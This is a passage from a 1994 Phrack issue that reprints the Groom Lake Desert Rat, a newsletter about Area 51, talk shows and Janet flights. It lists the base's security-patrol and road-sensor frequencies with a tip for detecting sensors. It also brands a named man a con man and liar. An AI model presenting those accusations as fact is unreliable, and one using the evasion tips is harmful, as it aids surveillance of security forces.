Cyber Christ and friends to battle the press and the stars at the
|
|||
|
opening of Planet Hollywood at Caesar's Palace.
|
|||
|
|
|||
|
And then an unexpected surprise. Lisa and friend; our first class
|
|||
|
objects of flirtation from the outbound trip which seemed like a
|
|||
|
month ago, appeared. But we were all so wiped out that a conti
|
|||
|
nent of innuendo turned into a series of short cat naps. We got
|
|||
|
a few flirts in, but nothing to write home about. Red Eye
|
|||
|
flights are just not what they're cracked up to be.
|
|||
|
|
|||
|
As I crawled into bed at something like 7AM Eastern, my wife
|
|||
|
awoke enough to ask the perennial wife question. "What did you
|
|||
|
do all weekend?" I, in turn, gave her the usual husbandly re
|
|||
|
sponse.
|
|||
|
|
|||
|
"Oh, nothing. Good night, Gracie."
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
(C) 1994 Winn Schwartau
|
|||
|
Winn Schwartau is an information security consultant, lecturer
|
|||
|
and, obviously, a writer. Please go buy his new book: "Informa
|
|||
|
tion Warfare: Chaos on the Electronic Superhighway." Available at
|
|||
|
book stores everywhere. Winn can be reached at: Voice:
|
|||
|
813.393.6600 or E-mail: P00506@Psilink.com
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 21 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
[Several of us had plans to tempt fate and join the other pop-culture
|
|||
|
lemmings running off to Area 51 during Defcon. The not-so-secret
|
|||
|
base has seen more press this year than Madonna. Armed with
|
|||
|
our ICOM 2SRAs and a copy of "The Area 51 Viewer's Guide"
|
|||
|
we planned to put our lives on the line purely for the sake of
|
|||
|
being able to say "We were there!"
|
|||
|
|
|||
|
The night before we were planning on going, FOX-TV broadcast
|
|||
|
an episode of "Encounters" that focused heavily on Area 51.
|
|||
|
The thought of tromping off on our little recon adventure
|
|||
|
accompanied by winnebago-loads of families taking the kids
|
|||
|
to see "that dang UFO place from the TV," just sorta ruined
|
|||
|
the mood.
|
|||
|
|
|||
|
Hopefully, this won't happen to you. And if you do go,
|
|||
|
you really should consider getting the "viewer's guide"
|
|||
|
from Glenn Campbell (psychospy@aol.com). Email him for
|
|||
|
a catalog of Area 51 stuff.
|
|||
|
|
|||
|
Glenn also publishes an electronic mag documenting recent activities
|
|||
|
surrounding Area 51, and related activities. With his permission,
|
|||
|
Phrack is extremely please to bring you the latest issue of
|
|||
|
"The Groom Lake Desert Rat."
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
THE GROOM LAKE DESERT RAT. An On-Line Newsletter.
|
|||
|
Issue #15. Sept. 2, 1994.
|
|||
|
-----> "The Naked Truth from Open Sources." <-----
|
|||
|
AREA 51/NELLIS RANGE/TTR/NTS/S-4?/WEIRD STUFF/DESERT LORE
|
|||
|
Written, published, copyrighted and totally disavowed by
|
|||
|
psychospy@aol.com. See bottom for subscription/copyright info.
|
|||
|
|
|||
|
In this issue...
|
|||
|
SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
|
|||
|
NEW AIR FORCE STATEMENT ON GROOM
|
|||
|
EG&G TO ABANDON TEST SITE
|
|||
|
JANET "N" NUMBERS
|
|||
|
JANET HANDOFF FREQUENCIES
|
|||
|
GROOMSTOCK '94
|
|||
|
SOUND FAMILIAR?
|
|||
|
CAMPBELL ARRAIGNED
|
|||
|
LARRY KING NOT CLONED?
|
|||
|
MYSTERIOUS SIGN DISAPPEARANCE
|
|||
|
INTEL BITTIES
|
|||
|
|
|||
|
[Note: This file ends with "###".]
|
|||
|
|
|||
|
----- MEDIA COMMUNICATIONS 103A -----
|
|||
|
|
|||
|
SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
|
|||
|
|
|||
|
In DR #10, we reviewed the major news media--print, radio and
|
|||
|
television--and showed how each could twist reality in their own
|
|||
|
special way. Strictly for the sake of science, Psychospy allowed
|
|||
|
himself to be turned into a minor media celebrity so we could
|
|||
|
report to our readers the sometimes dubious processes behind the
|
|||
|
scenes. There was a limit, however, to how low we would sink in
|
|||
|
the pursuit of knowledge. We would not take off our clothes for
|
|||
|
the camera, and we would not place ourselves in any situation
|
|||
|
where our credibility, reputation or dignity could be seriously
|
|||
|
trashed.
|
|||
|
|
|||
|
Now we can report that this barrier has been broken. In the next
|
|||
|
two issues of the Rat we will recount our first-hand experiences
|
|||
|
with the lowest form of mass media, the television talk show.
|
|||
|
|
|||
|
..... THE MEDIUM OF TALK .....
|
|||
|
|
|||
|
Talk shows come in three basic formats. The rarest but most
|
|||
|
respectable is the SERIOUS ISSUES talk show exemplified by "Meet
|
|||
|
the Press," "Nightline" and the roundtable discussions on PBS--
|
|||
|
maybe even "Larry King Live." They are dignified and serious,
|
|||
|
explore meaningful political and societal issues, and hardly
|
|||
|
anyone watches them.
|
|||
|
|
|||
|
The next rung down the ladder--vapid but benign--is the CELEBRITY
|
|||
|
CHAT talk show, like the "The Tonight Show," "Late Show with David
|
|||
|
Letterman" and "Arsenio Hall." Movie stars and Big Money authors
|
|||
|
pump their latest work in a non-confrontational environment
|
|||
|
designed only to promote laughs.
|
|||
|
|
|||
|
The last and lowest form of the genre is the HUMAN CONFLICT talk
|
|||
|
show. These syndicated programs always bear the name of the host,
|
|||
|
like "Oprah," "Geraldo," "Vicky" or "Leeza." He or she is a
|
|||
|
charismatic and camera-loving character, no doubt ruthless in real
|
|||
|
life, but blessed with the ability to convey warmth and sincerity
|
|||
|
on TV. The fodder for these shows is a steady diet of human
|
|||
|
suffering, crises, angst and tragedy. Former spouses and
|
|||
|
estranged friends face off against each other; grown men and women
|
|||
|
reveal to the parents their until-now-hidden perversities, and
|
|||
|
human oddities of all shapes and sizes present themselves for
|
|||
|
humiliation before a nationwide audience. The ultimate goal of
|
|||
|
these shows is the public expression of private feelings. They
|
|||
|
seek tears, anger, jealousy and graphic self-immolation recorded
|
|||
|
by the camera on a tight close-up. With a dozen such shows now in
|
|||
|
syndication, the competition is intense to seek out new forms of
|
|||
|
conflict and expose the latest narcissistic trends.
|
|||
|
|
|||
|
Talk shows are produced "live on tape" with minimal editing, and
|
|||
|
this presents special problems for a guest. In other forms of
|
|||
|
television, sound bites rule the show. It may seem artificial,
|
|||
|
but tight editing at least assures that each party has their say
|
|||
|
and only their finest bon mot will be used. The courteous speaker
|
|||
|
with a few good ideas can confidently compete with any
|
|||
|
extravagant, microphone-hogging blowhard, because most of what the
|
|||
|
blowhard says will be cut. In the almost-live talk show, the more
|
|||
|
reasonable speaker has to compete with the blowhard head on.
|
|||
|
There is no time for an orderly presentation of evidence; he who
|
|||
|
makes the most outrageous, confident and colorful claims,
|
|||
|
groundless or not, gains the camera's eye and controls the game.
|
|||
|
|
|||
|
If you have any shred of personal dignity and are asked to be a
|
|||
|
guest on a Human Conflict show, the best response is obvious:
|
|||
|
"Just Say No." Unless you are a masochist or a natural born
|
|||
|
actor, there is no way you can win in this format. We know it
|
|||
|
now; we knew it then, but sometimes, like Oedipus, you just can't
|
|||
|
stop the inevitable march of Fate....
|
|||
|
|
|||
|
..... ONWARD TO HUMILIATION .....
|
|||
|
|
|||
|
The path to our own downfall was indirect. For several months, a
|
|||
|
number of journalists have been making the pilgrimage to Freedom
|
|||
|
Ridge, and we generally escort them as a sort of local public
|
|||
|
relations representative. We do not charge for this service, and
|
|||
|
we do not discriminate between journalists. If TASS or Penthouse
|
|||
|
or the Podunk Review came to call, we would treat them no
|
|||
|
differently than the New York Times.
|
|||
|
|
|||
|
In May, we got a call from a producer from the Montel Williams
|
|||
|
Show, one of the Human Conflict shows that we had never seen. It
|
|||
|
seems that "Montel," as he is known to the world, had promised on
|
|||
|
an earlier talk show that he would visit the border of Area 51.
|
|||
|
We told the producer that we would be willing to escort Montel and
|
|||
|
his crew to Freedom Ridge to tape a segment, but we declined an
|
|||
|
offer to come to New York to appear on the studio show. Montel's
|
|||
|
visit was originally scheduled for May 5 but was canceled at the
|
|||
|
last minute, and we breathed a sign of relief.
|
|||
|
|
|||
|
In August, the project was reactivated, we suspect as the result
|
|||
|
of the June 22 article in the New York Times. Montel's visit was
|
|||
|
scheduled for Aug. 16, and we were again asked if we would go to
|
|||
|
New York to appear on the later show. Again, we declined.
|
|||
|
|
|||
|
When Montel came to Rachel, he brought a Humvee, his producers and
|
|||
|
a film crew. We went through the usual script for the camera:
|
|||
|
Montel drives up to our Research Center, and we meet him in the
|
|||
|
driveway. Inside, we show him where we are going on the map, then
|
|||
|
we get in the car and drive the rugged road to Freedom Ridge. We
|
|||
|
had done it before with countless crews, but never so quickly and
|
|||
|
in so few "takes." When Montel arrived, there was no question
|
|||
|
that he was in charge. He asked no significant questions, and
|
|||
|
showed no particular interest in the secret base itself. We
|
|||
|
sensed that he came only because he said he would and that his
|
|||
|
primary aim was to film a sound bite on the ridge that said, "You
|
|||
|
see, I did what I promised."
|
|||
|
|
|||
|
As we rode down from Freedom Ridge in the Humvee with Montel and
|
|||
|
the producer, we were again asked if we would come to New York to
|
|||
|
appear on the talk show the following week, Aug. 23. We hesitated
|
|||
|
and were about to turn down the offer cold, when the producer
|
|||
|
uttered the only horrible words that could force us to comply.
|
|||
|
|
|||
|
Sean David Morton.
|
|||
|
|
|||
|
..... THE EMBODIMENT OF EVIL .....
|
|||
|
|
|||
|
We first learned of Sean Morton over two years ago, before we came
|
|||
|
to Rachel. We had heard his enthusiastic endorsement of the Black
|
|||
|
Mailbox on a UFO video:
|
|||
|
|
|||
|
"Probably the most amazing thing about Area 51 is the fact that
|
|||
|
this is literally the only place in the world where you can go out
|
|||
|
and actually see flying saucers on a timetable basis. You can
|
|||
|
literally go out there on a Wednesday night between about seven
|
|||
|
and one a.m. and you'll see these things flying up and down the
|
|||
|
valley. It's absolutely amazing. On even a bad night you'll have
|
|||
|
ten, eleven, twelve sightings. On a good night--and I've been out
|
|||
|
there with friends of mine camping--on a good night the sky will
|
|||
|
just rip open with these things. You'll see anywhere between
|
|||
|
twenty to forty objects in a night testing over the base for
|
|||
|
anywhere from fifteen and forty minutes at a time."
|
|||
|
|
|||
|
We've lived near the border for over a year and a half now, are
|
|||
|
genuinely interested in UFOs and have spent countless days and
|
|||
|
nights in the desert; yet we haven't seen even ONE flying saucer,
|
|||
|
let alone scores. The logical explanation is that we arrived too
|
|||
|
late, after the saucers had been packed up and moved elsewhere.
|
|||
|
The trouble with this theory is that during the early part of our
|
|||
|
tenure, Sean Morton continued to bring tours to the area--at $99 a
|
|||
|
head--and reported UFOs everywhere.
|
|||
|
|
|||
|
In one celebrated incident in March 1993, Psychospy spent the
|
|||
|
night on White Sides, overlooking Groom Lake, with some aviation
|
|||
|
watchers and a writer from Popular Science. We were looking for
|
|||
|
the alleged Aurora spyplane--almost as ephemeral as flying
|
|||
|
saucers--but we saw nothing more than a few satellites, some
|
|||
|
distant aircraft strobes and an occasional meteor. The following
|
|||
|
was reported in the March 1994 Popular Science....
|
|||
|
|
|||
|
"Last March, three chilly airplane watchers with binoculars
|
|||
|
atop White Sides Mountain at this magic hour [4:45am] were
|
|||
|
tracking a 737 airliner approaching Groom Lake, as a fourth member
|
|||
|
of their group thawed out in his truck below. Parked on a knoll,
|
|||
|
he was next to a vanload of UFO seekers. They were lead by tour
|
|||
|
operator Sean Morton, whose leaflet described him as 'the world's
|
|||
|
foremost UFO researcher.'
|
|||
|
|
|||
|
"Morton donned a horned Viking helmet and from time to time
|
|||
|
pointed to the sky, exclaiming: 'Look at that one!' The airplane
|
|||
|
watcher trained his binoculars in the same direction but saw
|
|||
|
nothing out of the ordinary. Later, Morton's group became excited
|
|||
|
by what they perceived as an entire formation of UFOs; the
|
|||
|
airplane watcher's lenses revealed only stars. Finally, as the
|
|||
|
morning's first 737 made its gentle approach toward Groom Lake at
|
|||
|
4:45, the UFO enthusiasts rejoiced at Old Faithful's appearance.
|
|||
|
Everyone had seen exactly what they hoped for."
|
|||
|
|
|||
|
In the beginning, when we were new to the area, we were generous
|
|||
|
to Sean and called him "fantasy prone." As we got to know him
|
|||
|
better and gained confidence in our own knowledge base, we came to
|
|||
|
mince no words. Sean is a deliberate con man. He recognizes as
|
|||
|
well as us the landing lights of a 737, but he knows that others
|
|||
|
can be fooled and taken for a $99 ride to see them. If anyone is
|
|||
|
spreading disinformation about Area 51, filling the air with noise
|
|||
|
to make the truth harder to grasp, it isn't sinister government
|
|||
|
agents; it's Sean David Morton pursuing only his own greed and
|
|||
|
self-aggrandizement.
|
|||
|
|
|||
|
We have worked hard over the past 18 months to undo the damage
|
|||
|
Sean has done and displace him from the Area 51 scene.
|
|||
|
Discrediting Sean isn't complicated: We simply quote his own
|
|||
|
words whenever we can. Sean is a broadly diversified charlatan, a
|
|||
|
self-proclaimed expert in faith healing, earthquake prediction,
|
|||
|
psychic prophesy and virtually every other New Age fad. We have
|
|||
|
no problem at all with him plying his trade within the confines of
|
|||
|
the state of California where he justly belongs, but when he
|
|||
|
proclaims himself the foremost authority on Area 51, we get
|
|||
|
territorial. We hope that our "Area 51 Viewers Guide" has reduced
|
|||
|
the gullibility of newcomers and made the environment less
|
|||
|
attractive for leeches like him. In fact, we haven't had a
|
|||
|
confirmed Morton sighting near the border in over a year. We
|
|||
|
heard from sources in California that he no longer gave tours to
|
|||
|
Area 51 because the saucers had been moved elsewhere--which was
|
|||
|
fine by us.
|
|||
|
|
|||
|
The saucers must have returned, however. As the recent Groom Lake
|
|||
|
publicity reached its peak, "The World's Foremost UFO Researcher"
|
|||
|
could not help but resurface to suck energy from it. In recent
|
|||
|
months, reports began to reach us that he had appeared as an Area
|
|||
|
51 expert at UFO conferences, on radio talk shows and on the
|
|||
|
Montel Williams Show.
|
|||
|
|
|||
|
In the latter appearance, which was first broadcast in December
|
|||
|
1993, Sean showed video footage of nighttime "UFOs" that he said
|
|||
|
he photographed "at great risk to my own life." As we viewed them
|
|||
|
later, one clip showed an isolated circle of light jumping around
|
|||
|
within the frame. It could have been any stationary out-of-focus
|
|||
|
light shot through a hand-held video camera. Notches seen on the
|
|||
|
top and bottom of the "disk" correspond to protrusions inside the
|
|||
|
lens assembly. In the other clip, only slightly out of focus, we
|
|||
|
saw the lights of a 737 landing on the Groom Lake airstrip. To
|
|||
|
Sean, it was "an object actually coming in from space." The time
|
|||
|
stamp in the corner said "4:49 am."
|
|||
|
|
|||
|
It was on this show that Montel promised to visit Area 51 escorted
|
|||
|
by Sean; yet when Montel finally made the trip eight months later,
|
|||
|
Sean was not invited. The producer told us that word had reached
|
|||
|
him from many sources that Sean was considered a fraud, that in
|
|||
|
addition to UFOs he also did psychic prophesies and that his
|
|||
|
claimed credentials were highly dubious. He and Montel felt that
|
|||
|
Sean had taken advantage of them and that by having him on the
|
|||
|
show they had inadvertently legitimized him.
|
|||
|
|
|||
|
But none of that prevented them from inviting him back as a guest
|
|||
|
the second studio show.
|
|||
|
|
|||
|
As we rode down in the Humvee from Freedom Ridge with Montel and
|
|||
|
the producer, the reality to us became crystal clear: If we did
|
|||
|
not appear on the Montel Williams Show, then Sean would have the
|
|||
|
stage all to himself and could continue to spread any sort of
|
|||
|
nonsense about Area 51. We felt that we had no choice. Either we
|
|||
|
did battle with this guy now, before he grew bigger, or we would
|
|||
|
be cleaning up his mess for many months to come.
|
|||
|
|
|||
|
..... OUR RAPID EDUCATION .....
|
|||
|
|
|||
|
We had less than a week to prepare for the big show--nowhere near
|
|||
|
enough time to do all the research we needed. The first item of
|
|||
|
business was to actually watch the Montel Williams Show and
|
|||
|
familiarize ourselves with the format. We cranked up our
|
|||
|
satellite dish and surfed through the channels. On "Donahue":
|
|||
|
"Six Year Olds Who Sexually Harass Other Six Year Olds." On
|
|||
|
"Rolanda, a related topic: "Will Your Child Grow Up To Be A
|
|||
|
Serial Killer?" On "The Vicky Show," we heard that Sean Morton
|
|||
|
had just appeared as an expert on the prophesies of Nostradamus,
|
|||
|
but we were unable to catch that one.
|
|||
|
|
|||
|
The first Montel Williams Show we saw was, "Mistresses Who Want To
|
|||
|
End The Affair." On the stage, three women disguised by dark
|
|||
|
sunglasses explained why they had been attracted to married men.
|
|||
|
We could only tolerate about ten seconds at a time of this show,
|
|||
|
but when we tuned back, we found that the women had shed their
|
|||
|
sunglasses and revealed their true identities. Presumably, they
|
|||
|
had also revealed, or at least seriously compromised, the
|
|||
|
identities of the men they had been having the affairs with. When
|
|||
|
we tuned in again later, one of the three was having an angry
|
|||
|
argument with a fourth female guest. We guessed that this was the
|
|||
|
wife of one of the married men.
|
|||
|
|
|||
|
A friend sent us a tape of Montel's original UFO show in which
|
|||
|
Sean appeared as a "UFO Investigator" and Montel promised to
|
|||
|
visit. The show included an abductee, a witness to the "Kecksburg
|
|||
|
Incident," a former actress, WFUFOR Sean David Morton, a requisite
|
|||
|
skeptic, a pro-UFO filmmaker and--as if you hadn't guessed--that
|
|||
|
talk show regular Travis Walton. The show was conducted in the
|
|||
|
"expanding chairs" format. It started out with two guests alone
|
|||
|
on the stage, then more guests and chairs were added during each
|
|||
|
commercial break until there were seven chairs and seven
|
|||
|
squabbling speakers vying for attention on the platform. In this
|
|||
|
format, attention is diluted with each new chair, so the people
|
|||
|
who appear last, typically the skeptics, usually get only a few
|
|||
|
seconds of airtime. During the free-for-all of a seven-person
|
|||
|
debate, the camera always focuses on the most aggressive and
|
|||
|
charismatic guest--i.e. Sean David Morton.
|
|||
|
|
|||
|
The last chair to be filled was occupied by filmmaker Russ Estes,
|
|||
|
who the on-screen caption said, "Does Not Believe In UFOs." This
|
|||
|
is false. He is a disciplined UFO investigator who has devoted
|
|||
|
his career to making films on the subject, as well as exposing
|
|||
|
obvious frauds. What is true is that he "Does Not Believe In Sean
|
|||
|
Morton." In his few seconds of air time, he raised doubts about
|
|||
|
one of Morton's many fake credentials, his claimed "Doctor of
|
|||
|
Divinity" degree.
|
|||
|
|
|||
|
RUSS ESTES: "Montel, my biggest problem, and this is what I've
|
|||
|
run into over and over again, is the quality of the individual who
|
|||
|
is bringing me the message. You know, the-boy-that-cried-wolf
|
|||
|
syndrome is phenomenal in this field. You get people out there
|
|||
|
who are saying, I'm this, I'm that, and I hate to do this to you,
|
|||
|
Sean, but here's a guy right here who claims to be the Doctor,
|
|||
|
Reverend Sean David Morton. In his own biography, he claims to
|
|||
|
have gotten his Doctor of Divinity at--excuse me, it will take me
|
|||
|
one second...."
|
|||
|
|
|||
|
SEAN MORTON: "Berachah University."
|
|||
|
|
|||
|
RUSS ESTES: "Berachah University, Houston, Texas--the Berachah
|
|||
|
Church. I called them. They don't have any type of degrees that
|
|||
|
they give. They have Bible study at the best. He claims to have
|
|||
|
attended University of Southern California...."
|
|||
|
|
|||
|
MONTEL WILLIAMS: "So the point that you are making, Russ, is that
|
|||
|
there's a problem with the messenger, so therefore the message is
|
|||
|
not real."
|
|||
|
|
|||
|
RUSS ESTES: "How can you believe the message if the people lie to
|
|||
|
you from the start."
|
|||
|
|
|||
|
SEAN MORTON: "The thing I'd like to point out about Mr. Estes
|
|||
|
here is that if you don't like the message, you can shoot the
|
|||
|
messenger, and it's obvious to me that in the UFO field, we do
|
|||
|
this for free, we do this because we want to know the truth,
|
|||
|
because we have seen something...."
|
|||
|
|
|||
|
RUSS ESTES: "But does that mean you bogey up your credentials?"
|
|||
|
|
|||
|
SEAN MORTON (angry): "That is not true. You are flat-out lying
|
|||
|
to these people. I went to USC for four years."
|
|||
|
|
|||
|
Just then, the debate was cut off by a sloppy edit, and Sean's USC
|
|||
|
diploma appeared on the screen.
|
|||
|
|
|||
|
After watching the tape, we contacted Russ Estes. He said that
|
|||
|
the debate between he and Sean went on much longer than was shown
|
|||
|
on the screen. "Live on tape" does not mean totally unedited.
|
|||
|
This show went on for over two hours to obtain a one hour's worth
|
|||
|
of material. Sometimes, whole shows are thrown out when they
|
|||
|
don't work. Unfortunately, Estes made a misstep on the USC
|
|||
|
degree. As it turns out, this is just about the only authentic
|
|||
|
credential he has: a B.A. in Drama and Political Science. We
|
|||
|
certainly believe the Drama part: It's the last degree he ever
|
|||
|
needed.
|
|||
|
|
|||
|
The Doctor of Divinity degree is still phony, but in the talk show
|
|||
|
world, evidence counts for nothing; only emotions and presentation
|
|||
|
matter. Sean walked away from the show as a brave and
|
|||
|
knowledgeable crusader, legitimized by a promise from Montel to
|
|||
|
take his tour, and with the implied invitation to reappear on the
|
|||
|
show. Estes walked away alone, wasn't invited to return, and has
|
|||
|
since had to live down the "Does Not Believe in UFOs" moniker.
|
|||
|
Sean even had the delightful gall to send Estes a letter, through
|
|||
|
the producers...
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
Mr. Russ Estes
|
|||
|
c/o Alex Williams [sic]
|
|||
|
The Montel Williams Show
|
|||
|
1500 Broadway Suite 700
|
|||
|
New York, New York, 10036
|
|||
|
|
|||
|
Dear Russ:
|
|||
|
|
|||
|
I am going to assume that you are not a bold faced liar who is out
|
|||
|
for some kind of warped revenge, or a person who is just trying to
|
|||
|
make a buck off baseless slander.
|
|||
|
|
|||
|
Let's try to solve this like gentlemen - enclosed is a copy of my
|
|||
|
U.S.C. diploma. I have also called the school and my records are
|
|||
|
intact. The rest of your "research" on me is equally faulty.
|
|||
|
|
|||
|
I hope this solves out problem. If not, I have consulted my
|
|||
|
attorney and any further slander directed toward me through your
|
|||
|
video series or elsewhere, will result in action taken against
|
|||
|
you.
|
|||
|
|
|||
|
Yours Truly,
|
|||
|
[BIG signature]
|
|||
|
Sean Morton
|
|||
|
|
|||
|
---
|
|||
|
|
|||
|
Things were beginning to look grim for Psychospy. With the time
|
|||
|
of the taping drawing near, we hadn't even begun to scratch the
|
|||
|
surface of Sean David Morton and his path of destruction. Talking
|
|||
|
to our contacts, we saw that Sean had accumulated a vast audience
|
|||
|
of intimate enemies, more than we could possibly contact. If Sean
|
|||
|
sounds knowledgeable and occasionally has some meaningful
|
|||
|
information, it is because he has ripped it off from others. We
|
|||
|
were amused to find that there was even an reputable astrologer
|
|||
|
who hated Sean, who felt that Sean had stolen his predictions and
|
|||
|
passed them off as his own.
|
|||
|
|
|||
|
It seemed a futile exercise anyway. We knew all the evidence in
|
|||
|
the world wasn't going to matter when we actually faced off
|
|||
|
against Sean on camera. We were leaving behind our own
|
|||
|
comfortable medium of logic and data and stepping into his home
|
|||
|
turf--the talk show--where presentation counts more than content.
|
|||
|
We were obligated by our own ethics to speak only the simplest
|
|||
|
truths and the cautious assertions supported by data. Sean David
|
|||
|
Morton, bold faced liar that he is, faced no such constraints. He
|
|||
|
could spout any lie he wanted to sound important and get himself
|
|||
|
off the hook, and the only thing that mattered here was that he
|
|||
|
said it with apparent sincerity and that it held up for
|
|||
|
television's thirty second attention span. We knew that if we
|
|||
|
started to make an accusation about him, he would instantly sense
|
|||
|
the winds and make the same one against us with greater force.
|
|||
|
The ensuing argument would make he and us appear to be equals.
|
|||
|
|
|||
|
Sean knew all the buzzwords and cliches of the UFO movement and
|
|||
|
could spout the conventional wisdom much faster than we could. He
|
|||
|
knew how to sound sincere and reasonable and adapt instantly to
|
|||
|
the sentiments of any social circumstance. He was well-practiced
|
|||
|
at responding to inquisitions and had emerged from many without a
|
|||
|
scratch. Opposing him, all we had was a body of mundane knowledge
|
|||
|
about a very limited area of the desert. Sean was smooth and
|
|||
|
well-honed in his talk show delivery, and we were stumbling in for
|
|||
|
the first time to a medium where we really didn't want to be.
|
|||
|
|
|||
|
It was with these reservations and a sense of dark foreboding that
|
|||
|
we packed our bags and headed for New York City. There, in Times
|
|||
|
Square, we expected a titanic battle between Good and Evil, and
|
|||
|
things didn't look good for Good.
|
|||
|
|
|||
|
[To be continued in Desert Rat #16....]
|
|||
|
|
|||
|
----- NEW AIR FORCE STATEMENT ON GROOM -----
|
|||
|
|
|||
|
The following statement was recently released to inquiring
|
|||
|
journalists by the Nellis AFB public affairs office. (We
|
|||
|
requested our own copy from Major George Sillia on Aug. 26.) It
|
|||
|
represents a significant shift from the previous "We know nothing
|
|||
|
about Groom Lake" response.
|
|||
|
|
|||
|
"There are a variety of facilities throughout the Nellis Range
|
|||
|
Complex. We do have facilities within the complex near the dry
|
|||
|
lake bed of Groom Lake. The facilities of the Nellis Range
|
|||
|
Complex are used for testing and training technologies,
|
|||
|
operations, and systems critical to the effectiveness of U.S.
|
|||
|
military forces. Specific activities conducted at Nellis cannot
|
|||
|
be discussed any further than that."
|
|||
|
|
|||
|
That's a step in the right direction. What the base needs now is
|
|||
|
a name and a history. For example, tell us about the U-2 and A-12
|
|||
|
programs at Groom in the 1950s and 1960s. That's not very secret
|
|||
|
or critical to our current defense, so what's the point in
|
|||
|
pretending it is? Will the Air Force take control of the
|
|||
|
situation and provide this information itself, or will the void be
|
|||
|
filled by a dozen aggressive entrepreneurs?
|
|||
|
|
|||
|
We'd bet our money on the entrepreneurs.
|
|||
|
|
|||
|
----- EG&G TO ABANDON TEST SITE ----
|
|||
|
|
|||
|
According to an 8/26 article in the Las Vegas Review-Journal, EG&G
|
|||
|
and its REECo subsidiary will not seek renewal of their Nevada
|
|||
|
Test Site contract when it expires in 1995. These are two of the
|
|||
|
three companies that have managed the nuclear testing ground since
|
|||
|
its inception. It is unclear whether this action will have any
|
|||
|
affect on operations at the adjoining Groom Lake base, where EG&G
|
|||
|
and REECo are also assumed to be major contractors.
|
|||
|
|
|||
|
Recent rumors say that EG&G no longer operates the "Janet" 737
|
|||
|
jets that shuttle workers to Groom and Tonopah. That operation
|
|||
|
has supposedly been taken over by the Air Force, using the same
|
|||
|
aircraft and possibly the same staff.
|
|||
|
|
|||
|
----- JANET "N" NUMBERS -----
|
|||
|
|
|||
|
For aircraft watchers, here are the registration and serial
|
|||
|
numbers of Janet 737s and Gulfstream commuter planes spotted at
|
|||
|
the Janet terminal at McCarran airport. Based on observations in
|
|||
|
5/94 and the 4/30/94 FAA registry. One or more of the Janet
|
|||
|
aircraft are probably missing from this list. (We ask our readers
|
|||
|
to find them.)
|
|||
|
|
|||
|
Boeing 737...
|
|||
|
Reg. #/Serial #/Owner
|
|||
|
N4508W 19605 Great Western Capital Corp, Beverly Hills
|
|||
|
N4510W 19607 Great Western Capital Corp, Beverly Hills
|
|||
|
N4515W 19612 Great Western Capital Corp, Beverly Hills
|
|||
|
N4529W 20785 First Security Bank of Utah, Salt Lake City
|
|||
|
N5175U 20689 Dept. of the Air Force, Clearfield UT
|
|||
|
N5176Y 20692 Dept. of the Air Force, Clearfield UT
|
|||
|
N5177C 20693 Dept. of the Air Force, Clearfield UT
|
|||
|
|
|||
|
Gulfstream C-12...
|
|||
|
N20RA UB-42 Dept. of the Air Force, Clearfield UT
|
|||
|
N654BA BL-54 Dept. of the Air Force, Clearfield UT
|
|||
|
N661BA BL-61 Dept. of the Air Force, Clearfield UT
|
|||
|
N662BA BL-62 Dept. of the Air Force, Clearfield UT
|
|||
|
|
|||
|
----- JANET HANDOFF FREQUENCIES ----
|
|||
|
|
|||
|
A DESERT RAT EXCLUSIVE! Published here for the first time are the
|
|||
|
air traffic control frequencies for the "Janet" 737 crew flights
|
|||
|
from Las Vegas McCarran Airport to Groom. The McCarran freqs are
|
|||
|
public, but the Groom ones have not been revealed until now. Air
|
|||
|
traffic control broadcasts are "in the clear" and any scanner
|
|||
|
radio should be able to pick them up. Each of these freqs has
|
|||
|
been personally confirmed by Psychospy or a close associate.
|
|||
|
|
|||
|
121.9 McCarran Ground Control
|
|||
|
119.9 McCarran Tower
|
|||
|
133.95 Departure Control
|
|||
|
119.35 Nellis Control
|
|||
|
120.35 Groom Approach
|
|||
|
127.65 Groom Tower
|
|||
|
118.45 Groom Ground
|
|||
|
|
|||
|
Here are some other Groom freqs (some of which were previously
|
|||
|
reported in DR #8). The security frequencies are usually
|
|||
|
scrambled, but not always.
|
|||
|
|
|||
|
418.05 Cammo Dudes (primary)
|
|||
|
408.4 Cammo Dudes (repeat of 418.05)
|
|||
|
142.2 Cammo Dudes
|
|||
|
170.5 Cammo Dudes (Channel 3)
|
|||
|
138.3 "Adjustment Net" (seems related to security)
|
|||
|
261.1 Dreamland Control (published)
|
|||
|
255.5 Groom Tower (repeat of 127.65)
|
|||
|
154.86 Lincoln County Sheriff
|
|||
|
496.25 Road sensors on public land
|
|||
|
410.8 Pager (apparently from Groom but unconfirmed)
|
|||
|
|
|||
|
The most accurate way to detect a road sensor (AFTER you have
|
|||
|
tripped it), is to program 496.25 into several channels of your
|
|||
|
scanner, then scan those channels exclusively as you are driving.
|
|||
|
When the scanner stops on one channel, you have just passed a
|
|||
|
sensor.
|
|||
|
|
|||
|
----- GROOMSTOCK '94 -----
|
|||
|
|
|||
|
The "Freedom Ridge Free Speech Encampment" went pretty much as
|
|||
|
planned, with at least sixty people in attendance but not all of
|
|||
|
them staying for the night. There were no surprises and, sadly,
|
|||
|
no confrontations with the authorities when we whipped out our
|
|||
|
cameras and pseudo-cameras to point at the secret base. The Cammo
|
|||
|
Dudes were visible but kept their distance, and the only authority
|
|||
|
figure to show up on the ridge was a BLM Ranger in a Smoky-the-
|
|||
|
Bear hat. He was concerned only that we clean up our trash, and
|
|||
|
he warned us, by his very presence, that "Only You Can Prevent
|
|||
|
Forest Fires."
|
|||
|
|
|||
|
The event was recorded in an 8/29 article in the Las Vegas Review-
|
|||
|
Journal, which dubbed it "Groomstock." [The article may be
|
|||
|
available at the FTP site.] We were disturbed to read in the
|
|||
|
paper that the attendees included some "marijuana-smoking
|
|||
|
slackers." We called around and found out it was true and that it
|
|||
|
happened after Psychospy went to bed. Had we known, we would have
|
|||
|
quashed it immediately. This sort of thing discredits our ability
|
|||
|
to police ourselves and hurts the reputation of the land grab
|
|||
|
opponents.
|
|||
|
|
|||
|
The hot gossip around the campfire was about the Review-Journal
|
|||
|
reporter and the loony in the tie-dyed shirt. The loony had spent
|
|||
|
about an hour moving rocks and dirt around to make himself a
|
|||
|
